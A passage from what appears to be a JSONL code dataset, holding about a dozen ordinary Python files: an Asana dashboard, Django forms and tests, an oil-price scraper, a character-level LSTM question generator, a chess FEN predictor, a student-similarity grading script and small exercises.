generator.uid)\n","sub_path":"generation_projects/inductive_biases/person_lexical_content_apparition.py","file_name":"person_lexical_content_apparition.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"289323655","text":"#!/usr/bin/python\n\nimport urllib2, json, base64, time, datetime, sys\nfrom collections import OrderedDict\n\nconfig = json.loads( open(\"config.json\").read() )\nproject_id = config['project_id']\napi_key = config['api_key']\n\ndef get_data():\n\tsunday = datetime.date.today() - datetime.timedelta(days=datetime.date.today().weekday()+1)\n\n\tdates = dict()\n\n\tfor single_date in (sunday + datetime.timedelta(n) for n in range(7)):\n\t\tdates[time.mktime(single_date.timetuple())] = list()\n\n\tauthorization = \"%s:\" % api_key\n\trequest_headers = dict()\n\trequest_headers[\"Authorization\"] = \"Basic %s\" % base64.b64encode(authorization)\n\topener = urllib2.build_opener()\n\topener.addheaders = request_headers.items()\n\turl = \"https://app.asana.com/api/1.0/projects/%d/tasks?opt_fields=name,due_on\" % (project_id)\n\tdata = opener.open(url).read()\n\n\tfull_tasks = json.loads(data)\n\n\ttimed_tasks = [ t for t in full_tasks['data'] if t['due_on'] ]\n\n\tfiltered_tasks = list()\n\n\tfor task in timed_tasks:\n\t\tdue_on_timestamp = time.mktime(datetime.datetime.strptime(task['due_on'], \"%Y-%m-%d\").timetuple())\n\t\ttask['due_on_timestamp'] = due_on_timestamp\n\t\tif due_on_timestamp in dates.keys():\n\t\t\tdates[due_on_timestamp].append( task )\n\n\tfrom collections import OrderedDict\n\tdates = OrderedDict(sorted(dates.items(), key=lambda t: t[0]))\n\treturn dates\n","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"525754716","text":"import pytest\nfrom ecommerce.inventory.models import Product\n\n\n@pytest.mark.parametrize(\n \"id, name,\",\n [\n (1, \"widstar running sneakers\"),\n (4000, \"korkease nain sandals wout box\"),\n (8616, \"impact puse dance shoe\"),\n ],\n)\ndef test_inventory_db_product_dataset(db, django_db_setup, id, name):\n\n item = Product.objects.get(id=id)\n\n assert item.name == name\n","sub_path":"ecommerce/inventory/tests/test_db_fixtures.py","file_name":"test_db_fixtures.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"628419766","text":"#Author: Robert O Driscoll\n#This program is running in an hourly cronjob on my aws ec2 linux machine\n#\n#!/usr/bin/env python\nimport os\nimport MySQLdb\nimport urllib # URL functions\nimport urllib2 # URL functions\nimport time\nimport datetime\nimport requests\nfrom bs4 import BeautifulSoup\n\n########################################################################################\n#Opens database connetion and reads from daily reading table. The program reads the last \n#2 values from the epoch, volume and tempreture column and returns them. Using the \n#datetime.datetime.fromtimestamp()function and returns the formatted date and time from the \n#epoch. it subtracts the last 2 values from the volume table and returns the ammount to give the \n#user an idea of how much oil was used that day, and it returns the tempreture from that time \n#aswell. \n#######################################################################################\ndatabase = MySQLdb.connect(host='#####',user='#####',passwd='######',db='######') \ncursor = database.cursor()\ncursor.execute (\"SELECT epoch,vol,temp FROM dailydata ORDER BY id DESC LIMIT 2\")\ndata = cursor.fetchall ()\ndailyrow = [item[0] for item in data]\ndailyrow2 = [item[1] for item in data]\ndailyrow3 = [item[2] for item in data]\ndailytemp = dailyrow3[0]\ndailyepoch = datetime.datetime.fromtimestamp(dailyrow[0]).strftime('%c') \ndailylevelVar = dailyrow2[0]\ndailydropVar = dailyrow2[1] - dailylevelVar\n\n\n###########################################################################################\n#This code block does the same as above however it reads from the weekly table to give the user\n#an idea of the statistics on a weekly basis \n###########################################################################################\ncursor.execute (\"SELECT epoch,vol,temp FROM weeklydata ORDER BY id DESC LIMIT 2\")\ndata = cursor.fetchall ()\nweeklyrow = [item[0] for item in data]\nweeklyrow2 = [item[1] for item in data]\nweeklyrow3 = [item[2] for item in data]\nweeklytemp = weeklyrow3[0]\nweeklyepoch = datetime.datetime.fromtimestamp(weeklyrow[0]).strftime('%c') \nweeklylevelVar = weeklyrow2[0]\nweeklydropVar = weeklyrow2[1] - weeklylevelVar\n\ndailyhours = (dailyrow[0]-dailyrow[1])/3600\nweeklyhours = (weeklyrow[0]-weeklyrow[1])/3600\n\n\n##########################################################################################\n#Here we read in 2 seperate webpages and parse out the content needed by locating the nessasary \n#tags. \n##########################################################################################\nurl1 = \"http://www.cheapestoil.ie/distributors/Mor-Oil?l=7\"\nurl2 = \"http://www.cheapestoil.ie/distributors/MacMahon-Oil?l=7\"\n#url3 = \"http://www.cheapestoil.ie/heating-ces/Galway\"\nr1 = requests.get(url1)\nr2 = requests.get(url2)\n#r3 = requests.get(url3)\nsoup1 = BeautifulSoup(r1.content,\"lxml\")\nsoup2 = BeautifulSoup(r2.content,\"lxml\")\n#soup3 = BeautifulSoup(r3.content,\"lxml\")\n\nlinks1 = soup1.find_all(\"a\")\nlinks2 = soup2.find_all(\"a\")\n#links3 = soup3.find_all(\"a\")\n\noilInfo1 = soup1.find_all(\"div\", {\"id\": \"ctl00_ctl00_ContentPlaceHolder1_Distributorbody_pnlWorking\"})\noilInfo2 = soup2.find_all(\"div\", {\"id\": \"ctl00_ctl00_ContentPlaceHolder1_Distributorbody_pnlWorking\"})\n#oilInfo3 = soup3.find_all(\"span\", {\"class\": \"CellPrice\"})\n\n###################################################################################################\n#Then we use for loops to read through the text and save to string, as there were some special characters\n#from the irish letters in the oil companys names i attempted to parse them out using the\n#.encode('ascii', 'ignore').decode('ascii') function. I also created 2 other strings and loaded them with \n#the values taken from the database reults above. \n###################################################################################################\nfor item1 in oilInfo1:\n textString1 = item1.text\n\nfor item2 in oilInfo2:\n textString2 = item2.text\n\n\nnewString1 = textString1.encode('ascii', 'ignore').decode('ascii')\nnewString2 = textString2.encode('ascii', 'ignore').decode('ascii')\nnewString3 = \"%.2f Litres, %d Degrees, As of %s,dailyhours,%d\" % (dailydropVar,dailytemp,dailyepoch,dailyhours)\nnewString4 = \"%.2f Litres, %d Degrees, As of %s,weeklyhours,%d\" % (weeklydropVar,weeklytemp,weeklyepoch,weeklyhours)\n\n################################################################################################\n#I then opened a couple of text files and wrote the values to them an closed them.\n##################################################################################################\ntext_file1 = open(\"MorOil.txt\", \"w\")\ntext_file1.write(newString1)\ntext_file2 = open(\"MacMahon.txt\", \"w\")\ntext_file2.write(newString2)\ntext_file3 = open(\"dailyusage.txt\", \"w\")\ntext_file3.write(newString3)\ntext_file4 = open(\"weeklyusage.txt\", \"w\")\ntext_file4.write(newString4)\ntext_file1.close()\ntext_file2.close()\ntext_file3.close()\ntext_file4.close()\n\n","sub_path":"PythonScript/projectScripts/awsScripts/webScraper.py","file_name":"webScraper.py","file_ext":"py","file_size_in_byte":4967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"95470816","text":"choice = int(input(\"1.Sort by Cost (L-H)\\n\"\r\n \"2.Sort by Cost (H-L)\\n\"\r\n \"3.Sort by Rating\\n\"\r\n \"4.Sort by Discount (L-H)\\n\"\r\n \"5.Sort by Discount (H-L)\\n\"))\r\n\r\n\r\n\r\nproducts = [\r\n {\r\n \"pid\":1,\r\n \"name\":\"A1\",\r\n \"cost\":15000,\r\n \"brand\":\"Lenovo\",\r\n \"category\":\"Mobiles\",\r\n \"rating\":3,\r\n \"discount\":65\r\n },\r\n{\r\n \"pid\":2,\r\n \"name\":\"A2\",\r\n \"cost\":22500,\r\n \"brand\":\"Lenovo\",\r\n \"category\":\"Mobiles\",\r\n \"rating\":4,\r\n \"discount\":52\r\n },\r\n{\r\n \"pid\":3,\r\n \"name\":\"B1\",\r\n \"cost\":18000,\r\n \"brand\":\"Samsung\",\r\n \"category\":\"Mobiles\",\r\n \"rating\":2,\r\n \"discount\":60\r\n },\r\n{\r\n \"pid\":4,\r\n \"name\":\"B2\",\r\n \"cost\":12500,\r\n \"brand\":\"Samsung\",\r\n \"category\":\"Mobiles\",\r\n \"rating\":3,\r\n \"discount\":40\r\n },\r\n{\r\n \"pid\":5,\r\n \"name\":\"C1\",\r\n \"cost\":45500,\r\n \"brand\":\"Samsung\",\r\n \"category\":\"TV\",\r\n \"rating\":4,\r\n \"discount\":35\r\n },\r\n{\r\n \"pid\":5,\r\n \"name\":\"C3\",\r\n \"cost\":43000,\r\n \"brand\":\"LG\",\r\n \"category\":\"TV\",\r\n \"rating\":4,\r\n \"discount\":35\r\n },\r\n{\r\n \"pid\":6,\r\n \"name\":\"C3\",\r\n \"cost\":38000,\r\n \"brand\":\"Sony\",\r\n \"category\":\"TV\",\r\n \"rating\":3,\r\n \"discount\":40\r\n },\r\n{\r\n \"pid\":7,\r\n \"name\":\"D1\",\r\n \"cost\":11000,\r\n \"brand\":\"JBL\",\r\n \"category\":\"Speaker\",\r\n \"rating\":1,\r\n \"discount\":40\r\n },\r\n{\r\n \"pid\":8,\r\n \"name\":\"D2\",\r\n \"cost\":8000,\r\n \"brand\":\"Sony\",\r\n \"category\":\"Speaker\",\r\n \"rating\":3,\r\n \"discount\":51\r\n },\r\n{\r\n \"pid\":9,\r\n \"name\":\"E1\",\r\n \"cost\":82000,\r\n \"brand\":\"HP\",\r\n \"category\":\"Laptop\",\r\n \"rating\":5,\r\n \"discount\":47\r\n },\r\n{\r\n \"pid\":10,\r\n \"name\":\"E1\",\r\n \"cost\":56000,\r\n \"brand\":\"ASUS\",\r\n \"category\":\"Laptop\",\r\n \"rating\":4,\r\n \"discount\":51\r\n }\r\n\r\n]\r\n\r\nprint (type(products))\r\n\r\n#sort\r\nsorttype =[[\"cost\",False],[\"cost\",True],[\"rating\",True],[\"discount\",False],[\"discount\",True]]\r\n\r\n\r\n\r\nproducts.sort(key = lambda ele: ele[sorttype[choice-1][0]], reverse=sorttype[choice-1][1])\r\n\r\n\r\nprint(\"Name\" ,\"Cost\" ,\"Brand\" ,\"Category\" ,\"Rating\" ,\"Discount\",sep=\"\\t\\t\")\r\nfor i in products:\r\n print(i[\"name\"],\" \",i[\"cost\"],\" \",i[\"brand\"],\" \",i[\"category\"],\" \",i[\"rating\"],\" \",i[\"discount\"],sep=\"\\t\")\t\r\n\t\t\r\n#filter\r\nchoice2 = int(input(\"1.Filter by Name\\n\"\r\n \"2.Filter by Brand\\n\"\r\n \"3.Filter by Category\\n\"))\r\nfiltertype =[\"name\",\"brand\",\"category\"]\r\n\r\nstring = input(\"Enter : \")\r\n\r\nnewobj = filter(lambda ele: ele[filtertype[choice2-1]] == string,products)\r\n\r\n\r\nprint(\"Name Cost Brand Category Rating Discount\") \r\n\r\nfor i in newobj:\r\n print(i[\"name\"],\" \",i[\"cost\"],\" \",i[\"brand\"],\" \",i[\"category\"],\" \",i[\"rating\"],\" \",i[\"discount\"],sep=\"\\t\")\r\n\t\r\n\r\n\r\n\r\n\t\t\r\n\r\n\r\n\r\n\r\n","sub_path":"Assignments python/day2/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"102400417","text":"from minos.lib.util.measures import MeasureDistDirTime\n\nconfig = {\n 'task': 'point_goal',\n 'goal': {'position': 'random', 'radius': 0.25},\n 'measure_fun': MeasureDistDirTime(goal_dist_threshold=0.4),\n 'reward_type': 'dist_time',\n 'agent': {'radialClearance': 0.2},\n 'scene': {'dataset': 'mp3d'},\n 'scenes_file': '../data/scenes.mp3d.csv',\n 'states_file': '../data/episode_states.mp3d.csv.bz2',\n 'num_episodes_per_scene': 100,\n 'max_states_per_scene': 10,\n 'scene_filter': lambda s: 2 < s['nrooms'] < 11,\n 'episode_filter': lambda e: e['pathNumRooms'] > 0,\n 'objective_size': 4 # For UNREAL\n}\n","sub_path":"minos/config/envs/pointgoal_mp3d_s.py","file_name":"pointgoal_mp3d_s.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"408508717","text":"from django import forms\nfrom .models import Post, Comment\n\ndef min_length_3_validator(value):\n if len(value) < 3:\n raise forms.ValidationError('3글자 이상 입력해주세요.')\n\nclass PostForm(forms.Form):\n title = forms.CharField(validators=[min_length_3_validator]) # 제목\n text = forms.CharField(widget=forms.Textarea) # 내용\n\n\n# Model Form을 상속받는\nclass PostModelForm(forms.ModelForm):\n # ModelForm : Model과 연관된 Form을 만듦\n class Meta: # rule\n model = Post\n fields = ('title', 'text')\n # validate검사를 Modelform에서 할 수 없음\n # 그래서 Model에서 해주어야한다.\n\nclass CommentModelForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ('author', 'text')","sub_path":"django/django_src/blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"263327735","text":"from typing import List, Tuple, Optional, Union\n\nfrom numpy import array, log2\nfrom numpy.random import choice,randint,shuffle\nfrom keras import Model\nfrom keras.layers import Input, Dropout, Dense, LSTM, Embedding, add\nfrom keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.utils import to_categorical\n\nfrom utils.poincare_encoder import PoincareEmbeddings\n\nclass SemanticCaptioningCharacterLSTMDecoder:\n \"\"\"\n generates a relevant question\n when given the semantics of a sentence\n using a custom-trained character-based LSTM \n and a pre-trained sentence encoder\n \"\"\"\n\n def __init__(self,recursion_depth:int,path_to_model_weights:Optional[str]=None) -> None:\n self.recursion_depth = recursion_depth\n self.semantic_encoder = PoincareEmbeddings(\"utils/poincare_embeddings.json\")\n a = ord('a')\n z = ord('z')\n is_valid_character = lambda character: character.isspace() or a <= ord(character) <= z\n self.clean_string = lambda text:''.join(filter(is_valid_character,text.lower().strip()))\n self.start_token='|'\n self.stop_token='?'\n character_set = [' '] + list(map(chr,range(a,z+1))) + [self.start_token,self.stop_token]\n self.index_character_mapping = dict(enumerate(character_set))\n self.character_index_mapping = {\n character:index for index,character in self.index_character_mapping.items()\n }\n self.number_of_characters = len(character_set)\n self.model = self.build_character_based_LSTM(\n semantic_vector_length=self.semantic_encoder.vector_length,\n character_vector_length=self.number_of_characters,\n character_sequence_length=self.recursion_depth,\n hidden_layer_length=100,\n dropout_rate=.0,\n activation=\"relu\",\n loss = \"categorical_crossentropy\",\n optimisation= \"adam\",\n weights=path_to_model_weights,\n )\n\n def train(\n self, questions:List[str], \n batch_size:int, epochs:int, \n save_to_file_path:str=\"char_lstm_weights.hdf5\",\n question_contexts:Optional[List[str]]=None\n ) -> None:\n \"\"\"\n if only questions are provided (e.g. from the Quora Dataset),\n the model is trained only on the unlabelled questions \n (attempting to do a type of Unsupervised Learning)\n in a fashion similar to Image Captioning (Image->Text)\n but using Semantics instead - Semantic Captioning (semantics->text)\n\n if question_contexts are provided too (the prompt that triggers each question)\n then the model similarly does Semantic Captioning (Contexts->Text)\n but uses the semantics of the question_contexts instead of the Questions\n (since the question_contexts are mapped to the questions, like labels, \n the model is now being trained via supervised learning)\n \"\"\"\n sample_size = len(questions)\n steps_per_epoch = sample_size//batch_size\n for epoch in range(epochs):\n chosen_index = randint(0,sample_size)\n expected_question = str(questions[chosen_index])\n example_sentence = expected_question if question_contexts is None else str(question_contexts[chosen_index])\n print(f\"epoch {epoch}: {example_sentence}\\n\\texpected: {expected_question}\\n\\ttop-p=.8,temperature=1.2 {self.generate(example_sentence,top_p=.8,temperature=1.2)}\\n\\ttop-p=.9 temperature = 1.2: {self.generate(example_sentence,top_p=.9,temperature=1.2)}\\n\\ttop_p=.8, temperature = .5: {self.generate(example_sentence,top_p=.8,temperature=.5)}\")\n self.model.fit(\n self._get_training_data(questions, batch_size, question_contexts), \n verbose=True, epochs=1, steps_per_epoch=steps_per_epoch, \n )\n self.model.save_weights(save_to_file_path)\n\n def _get_training_data(self,questions:List[str],batch_size:int,contexts:Optional[List[str]]) -> Tuple[Tuple[array,array],array]:\n question_numbers = list(range(len(questions)))\n iteration_count,X_meaning, X_characters, Y_characters = 0,[],[],[]\n while True:\n shuffle(question_numbers)\n for question_number in question_numbers:\n iteration_count+=1 \n question = questions[question_number]\n semantics = question if contexts is None else contexts[question_number]\n semantic_vector = self._get_semantic_vector(semantics)\n processed_question = self._preprocess_characters(question)\n character_indexes = self._convert_characters_to_index(processed_question)\n for index in range(1, len(character_indexes)):\n contextual_character_indexes = character_indexes[:index]\n next_character_index = character_indexes[index] \n X_meaning.append(semantic_vector)\n X_characters.append(self._pad(indexes=contextual_character_indexes))\n Y_characters.append(self._one_hot_encode_output(next_character_index))\n\n if iteration_count==batch_size:\n yield ([array(X_meaning), array(X_characters)],array(Y_characters))\n iteration_count,X_meaning, X_characters, Y_characters = 0,[],[],[]\n\n \n def generate(self, sentence:str, temperature:Optional[float]=None, top_p:Optional[float]=None) -> str:\n \"\"\"\n given a conversation\n a question is asked about it\n (if no temperature specified\n use greedy decoding by default)\n \"\"\"\n conditional_vector = array([self._get_semantic_vector(sentence)])\n generated_question = self.start_token\n for _ in range(self.recursion_depth):\n generated_question += self._predict_next_character(\n meaning_vector=conditional_vector,\n contextual_characters=generated_question,\n temperature= temperature,\n top_percentage=top_p\n )\n if self.stop_token in generated_question:\n break\n return generated_question\n\n def _predict_next_character(self, meaning_vector:array,contextual_characters:str,temperature:Optional[float],top_percentage:Optional[float],return_probability:bool=False) -> Union[str,Tuple[str,float]]:\n \"\"\"\n pick most confident prediction\n this is local optimal but will not arrive at global optimal\n (use beam search for that)\n but optimal is not the most realistic decoding strategy\n better to pick a more varied range to add novelty (e.g. p-decoding)\n \"\"\"\n characters_vector = array([self._pad(self._convert_characters_to_index(contextual_characters))])\n output_vector = self.model.predict((meaning_vector,characters_vector),verbose=False)\n predicted_index = self._nucleus_decode(output_vector,top_percentage,temperature) if top_percentage else self._temperature_decode(output_vector,temperature) if temperature else self._greedy_decode(output_vector)\n predicted_character = self.index_character_mapping.get(predicted_index)\n if not return_probability: \n return predicted_character\n probability = output_vector[0][predicted_index]\n return (predicted_character,probability)\n\n def _convert_characters_to_index(self, characters:str) -> List[int]:\n return list(map(self.character_index_mapping.get,characters))\n\n def _pad(self, indexes:List[int]) -> array:\n return pad_sequences([indexes], maxlen=self.recursion_depth)[0]\n\n def _get_semantic_vector(self, text:str) -> array:\n return self.semantic_encoder.encode(self.clean_string(text))\n\n def _one_hot_encode_output(self, index:int) -> array:\n return to_categorical([index], num_classes=self.number_of_characters)[0]\n\n def _preprocess_characters(self, text:str) -> str:\n return f\"{self.start_token} {self.clean_string(text)} {self.stop_token}\"\n\n @staticmethod\n def _nucleus_decode(predicted_vector:array, top_p:float, temperature:Optional[float]) -> int:\n probabilities = predicted_vector[0]\n probabilities /= probabilities.sum()\n ranked_indexes = sorted(range(probabilities.size), key=lambda index:probabilities[index],reverse=True)\n probabilities.sort()\n ranked_probabilities = probabilities[::-1]\n for index in range(ranked_probabilities.size):\n if ranked_probabilities[:index].sum() >= top_p:\n nuclues_probabilities = ranked_probabilities[:index]\n nuclues_indexes = ranked_indexes[:index]\n break\n if temperature: nuclues_probabilities *= temperature\n nuclues_probabilities /= nuclues_probabilities.sum()\n return choice(nuclues_indexes,1,p=nuclues_probabilities)[0]\n \n @staticmethod\n def _temperature_decode(predicted_vector:array,temperature:float) -> int:\n probabilities = predicted_vector[0]\n probabilities *= temperature\n probabilities /= probabilities.sum()\n return choice(range(probabilities.size),1,p=probabilities)[0]\n\n @staticmethod\n def _greedy_decode(predicted_vector:array) -> int:\n return predicted_vector[0].argmax()\n\n @staticmethod\n def build_character_based_LSTM(\n semantic_vector_length:int,\n character_vector_length:int,\n character_sequence_length:int,\n hidden_layer_length:int,\n dropout_rate:float,\n optimisation:str,\n activation:str,\n weights:Optional[str],\n loss:str,\n ) -> Model:\n\n meaning_layer1 = Input(shape=(semantic_vector_length,))\n meaning_dropout1 = Dropout(dropout_rate)(meaning_layer1)\n meaning_layer2 = Dense(hidden_layer_length, activation=activation)(meaning_dropout1)\n characters_layer1 = Input(shape=(character_sequence_length,))\n characters_layer2 = Embedding(character_vector_length, character_vector_length, mask_zero=True)(characters_layer1)\n characters_dropout2 = Dropout(dropout_rate)(characters_layer2)\n characters_layer3 = LSTM(hidden_layer_length,return_sequences=True)(characters_dropout2)\n characters_dropout3 = Dropout(dropout_rate)(characters_layer3)\n characters_layer4 = LSTM(hidden_layer_length)(characters_dropout3)\n layer3 = add([meaning_layer2, characters_layer4])\n layer4 = Dense(hidden_layer_length, activation=activation)(layer3)\n layer5 = Dense(character_vector_length, activation='softmax')(layer4)\n model = Model(\n inputs=[meaning_layer1, characters_layer1], \n outputs=layer5\n )\n if weights is not None: model.load_weights(weights)\n model.compile(loss=loss, optimizer=optimisation)\n return model ","sub_path":"src/semantic_captioning_character_lstm_decoder.py","file_name":"semantic_captioning_character_lstm_decoder.py","file_ext":"py","file_size_in_byte":10856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"145425118","text":"import tensorflow\nimport numpy\nimport io\nimport os\n\nfrom base64 import b64decode\nfrom skimage import transform\nfrom skimage.io import imread\nfrom skimage.util.shape import view_as_blocks\n\nDIM = 8 # Chess board 8 x 8\nSQUARE_SIZE = 40 # Tile size\nPIECE_SYMBOLS = \"prbnkqPRBNKQ \" # Chess piece symbols\nLABEL2SYMBOL = {p:i for i, p in enumerate(PIECE_SYMBOLS)} # Map to convert lables back to piece symbols\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\ndef preprocess_image(img: numpy.ndarray) -> numpy.ndarray:\n \"\"\"Preprocess an image for using it as model input. Initially the image is downsampled\n and then it is split to blocks.\n\n Args:\n img (numpy.ndarray): Image as a numpy array\n\n Returns:\n numpy.ndarray: Preprocessed image \n \"\"\"\n downsample_size = SQUARE_SIZE*DIM\n\n img_read = transform.resize(\n img,\n (downsample_size, downsample_size),\n mode='constant'\n )[:,:,:3] # Drop alpha in case of png\n\n tiles = view_as_blocks(img_read, block_shape=(SQUARE_SIZE, SQUARE_SIZE, 3)).squeeze(axis=2)\n return tiles.reshape(DIM*DIM, SQUARE_SIZE, SQUARE_SIZE, 3)\n\ndef deserialize_image(img_payload: str) -> numpy.ndarray:\n \"\"\"Returns an image byte-like object from base64 payload\n\n Args:\n img_payload (str): base64 encoded image\n\n Returns:\n bytes: Image as numpy array\n \"\"\"\n return imread(io.BytesIO(b64decode(img_payload))) / 255\n\ndef reconstruct_from_blocks(img: numpy.ndarray) -> numpy.ndarray:\n \"\"\"Reconstructs the original image from a given preprocessed image.\n The preprocessed image is split into blocks and this function stitches them back together.\n\n Args:\n preprocessed_img (numpy.ndarray): Preprocessed image as numpy array\n\n Returns:\n numpy.ndarray: Reconstructed image as numpy array\n \"\"\"\n return img.numpy().reshape(\n DIM, DIM, SQUARE_SIZE, SQUARE_SIZE, 3\n ).transpose(0, 2, 1, 3, 4).reshape(\n SQUARE_SIZE * DIM,SQUARE_SIZE * DIM, 3\n )\n\ndef labels2fen(labels: numpy.ndarray) -> str:\n \"\"\"Converts arithmetic piece symbol labels to fen notation\n\n Args:\n labels (numpy.ndarray): \n\n Returns:\n str: FEN notation of the give piece labels\n \"\"\"\n fen = \"/\".join(\"\".join(PIECE_SYMBOLS[p] for p in row) for row in labels)\n for i in range(DIM, 0, -1):\n fen = fen.replace(' ' * i, str(i))\n return fen\n\ndef fen2labels(fen: str) ->numpy.ndarray:\n \"\"\"Converts fen notation to arithmetic labels. \n\n Args:\n fen (str): FEN notation as string sequence\n\n Returns:\n numpy.ndarray: Numpy array containing the piece labels \n \"\"\"\n labels = []\n for row in fen.split(\"/\"):\n row_labels = []\n for p in row:\n row_labels += (int(p) * [LABEL2SYMBOL[' ']] if p.isnumeric() else [LABEL2SYMBOL[p]])\n labels += [row_labels]\n return numpy.array(labels)\n\ndef difference(img_a: numpy.ndarray, img_b: numpy.ndarray) -> numpy.float64:\n \"\"\"Returns the maximum difference amongst the pixels of two images.\n\n Args:\n img_a (numpy.ndarray): Image A as numpy array\n img_b (numpy.ndarray): Image B as numpy array\n\n Returns:\n numpy.float64: Pixel difference\n \"\"\"\n difference = (img_a - img_b).reshape(-1)\n return max(difference.max(), abs(difference.min()))\n\ndef is_visually_similar(img_a: numpy.ndarray, img_b: numpy.ndarray, threshold: float) -> bool:\n \"\"\"Checks whether two images are visually similar given difference threshold.\n The lower the threshold, the more visually similar the images must be\n\n Args:\n img_a (numpy.ndarray): Image A as numpy array\n img_b (numpy.ndarray): Image B as numpy array\n threshold (float): Difference threshold\n\n Returns:\n bool: True if similarity is below threshold, False otherwise\n \"\"\"\n diff = difference(img_a, img_b)\n print(\"diff: \", diff)\n return diff <= threshold \n\ndef predict_fen(img: numpy.ndarray, model_path: str = os.path.join(BASE_DIR,\"model\")) -> str:\n \"\"\"Predicts the FEN notation of the given board image.\n Image dimensions must be 320x320\n\n Args:\n img (numpy.ndarray): Image as numpy array\n model_path (str): Path of the saved model to use\n \n Returns:\n str: FEN notation as a string \n \"\"\"\n model = tensorflow.keras.models.load_model(model_path)\n prediction = model.predict(img)\n board = prediction.argmax(axis=1).reshape(DIM, DIM)\n return labels2fen(board)","sub_path":"AI/Neuralmate/neuralmate.py","file_name":"neuralmate.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"67038924","text":"import pymysql\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import pyplot\n\n\ndef draw(similar, label):\n plt.plot(similar, label, 'o', color='b')\n plt.show()\n\n\n# draw()\ndb = pymysql.connect(\"127.0.0.1\", \"root\", \"qq123456\", \"detect_web\")\ncursor = db.cursor()\nsql = \"SELECT * FROM user_compare_detail where cid_id=29 order by similar DESC\"\ncursor.execute(sql)\nsimilar = []\nfor data in cursor.fetchall():\n similar.append(data)\n\nusers = []\nfor data in similar:\n if data[1] not in users:\n users.append(data[1])\n if data[2] not in users:\n users.append(data[2])\n\nprint(users)\n\nsql = \"SELECT distinct user1 FROM user_compare_detail where cid_id=29\"\ncursor.execute(sql)\nuser = {}\nfor u in users:\n t = []\n for d in similar:\n if d[1] == u or d[2] == u:\n t.append(d)\n user.setdefault(u, t)\n\n# score = {\"02小明同学\": 99, \"18抄袭狂魔同学\": 88, \"03小东同学\": 78}\nscore = {}\nprior = []\nmustHand = []\nevalues = []\nfor key in user.keys():\n \"评分\"\n if not (key in score):\n \"取前两个最相近的同学分数\"\n print(\"********************************************\")\n print(key)\n userlist = user.get(key)\n u1 = userlist[0]\n u2 = userlist[1]\n print(\"两个最接近的同学\")\n print(u1)\n print(u2)\n print(\"+++++++++++++++++++++++++++++++\")\n\n if float(u1[3]) <= 70 or float(u2[3]) <= 70:\n print(\"无法评估,\" + str(key) + \"同学成绩,参考用户相似度过低\")\n mustHand.append(key)\n continue\n\n u1_key = \"\"\n u2_key = \"\"\n if u1[1] == key:\n u1_key = u1[2]\n else:\n u1_key = u1[1]\n \"获取第一个用户与第二个用户的评估分值\"\n if u2[1] == key:\n u2_key = u2[2]\n else:\n u2_key = u2[1]\n\n u1_score = score.get(u1_key)\n u2_score = score.get(u2_key)\n if (u1_score is None) or (u2_score is None):\n print(\"无法评估,\" + str(key) + \"同学成绩,参考用户未评分\")\n if u1_key not in score:\n score.setdefault(u1_key, 0)\n prior.append(u1_key)\n if u2_key not in score:\n score.setdefault(u2_key, 0)\n prior.append(u2_key)\n evalues.append(key)\n continue\n\n print(\"u1 score, u2 score\", str(u1_score), str(u2_score))\n evalue = 2 / ((1 / u1_score) + (1 / u2_score))\n evalue = int(evalue)\n print(\"同学:\" + str(key) + \",评估分值:\" + str(evalue))\n score.setdefault(key, evalue)\n print(\"********************************************\")\n evalues.append(key)\n\nprint(\"++++++++++++++++++++++++++++++++++++++++++++\")\nprint(score)\nprint(\"建议优先评分:\")\nprint(prior)\nprint(\"必须手工评分:\")\nprint(mustHand)\nprint(\"可进行自动评分:\")\nprint(evalues)\n","sub_path":"local-draw.py","file_name":"local-draw.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"490618595","text":"agenda = [['Ana', '99999-1234'], ['Bia', '99999-5678']]\n\np = 'd'\nwhile p != 'c':\n print('(a) Adicionar telefones na agenda')\n print('(b) Procurar um telefone')\n print('(c) Sair')\n p = str(input('-> '))\n if p == 'a':\n nome = str(input('Digite o nome? '))\n numero = str(input('Digite o numero? '))\n aux = ['','']\n aux[0] = nome\n aux[1] = numero\n agenda.append(aux)\n agenda = sorted(agenda)\n print('Adicionado.\\n')\n elif p == 'b':\n nome = str(input('Digite o nome? '))\n b = False\n for i in agenda:\n if i[0] == nome:\n print(i[1])\n b = True\n if b == False:\n print('Não está na agenda.')\n\nprint(agenda)\n","sub_path":"Lista de exercicios 5/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"462657123","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport os\nimport logging\nimport gc\nfrom multiprocessing import Pool\nfrom functools import partial\n\nprice_threshold=10\n\n\n# In[2]:\n\n# last_saturday=datetime.datetime.now().date()-datetime.timedelta(days=(datetime.datetime.now().date().weekday()+2))\n# print(last_saturday)\nlast_saturday=datetime.date(2019,2,2) # To be changed to the running 